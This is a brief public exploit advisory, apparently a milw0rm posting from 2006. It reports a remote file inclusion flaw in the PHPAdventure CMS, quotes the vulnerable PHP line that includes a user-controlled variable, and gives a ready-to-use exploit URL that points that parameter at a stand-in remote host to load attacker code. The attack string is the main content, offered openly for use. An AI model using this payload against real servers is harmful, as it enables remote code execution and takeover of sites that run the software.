26 lines
No EOL
693 B
Text
26 lines
No EOL
693 B
Text
*********************************************
|
|
D.O.M TEAM
|
|
Bug found: HER0
|
|
cms: PHPAdventure
|
|
type: rfi
|
|
risk: High
|
|
download:http://prdownloads.sourceforge.net/phpadventure/phpadv11.tar.gz
|
|
contac:16.her0@gmail.com
|
|
nota: all the versions of PHPAdventure is affected..
|
|
********************************************
|
|
line of the code:
|
|
|
|
<?php
|
|
$_stage = 1;
|
|
include($_mygamefile);
|
|
?>
|
|
|
|
exploit:
|
|
/ad_main.php?_mygamefile=http://evilcode.txt?
|
|
****************************************************************
|
|
www.domteam.info
|
|
|
|
greetz:Sponge Bob,Bob esponja XDDDD...
|
|
******************************************************************************************
|
|
|
|
# milw0rm.com [2006-11-07] |